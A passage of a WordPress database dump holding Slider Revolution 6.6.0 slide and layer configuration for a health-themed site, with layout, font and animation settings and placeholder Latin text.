Start\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"243px\",\"e\":true},\"n\":{\"v\":\"161px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"65px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"No vis summo prompta adipiscing, ad pri amet accusata. Magna ullum omittantur.\",\"alias\":\"Quisque quis velit d...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"421px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"397px\",\"e\":true},\"m\":{\"v\":\"301px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"421px\"},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"338px\",\"e\":true},\"n\":{\"v\":\"254px\",\"e\":true},\"t\":{\"v\":\"125px\",\"e\":true},\"m\":{\"v\":\"145px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":500},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22px\",\"e\":true},\"m\":{\"v\":\"20px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button text=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"345px\",\"e\":true},\"n\":{\"v\":\"181px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"422px\",\"e\":true},\"n\":{\"v\":\"337px\",\"e\":true},\"t\":{\"v\":\"195px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1200,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(14,6,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h5-slider-graphic-2.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"02\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"effects\":{\"parallax\":\"9\"},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Be healthy!\",\"alias\":\"Quick Start\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"243px\",\"e\":true},\"n\":{\"v\":\"161px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"65px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Ne nec vivendum comprehensam, mundi comm odo usu no, an vix alterum percipit.\",\"alias\":\"Quisque quis velit d...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"421px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"397px\",\"e\":true},\"m\":{\"v\":\"301px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"421px\"},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"338px\",\"e\":true},\"n\":{\"v\":\"254px\",\"e\":true},\"t\":{\"v\":\"125px\",\"e\":true},\"m\":{\"v\":\"145px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"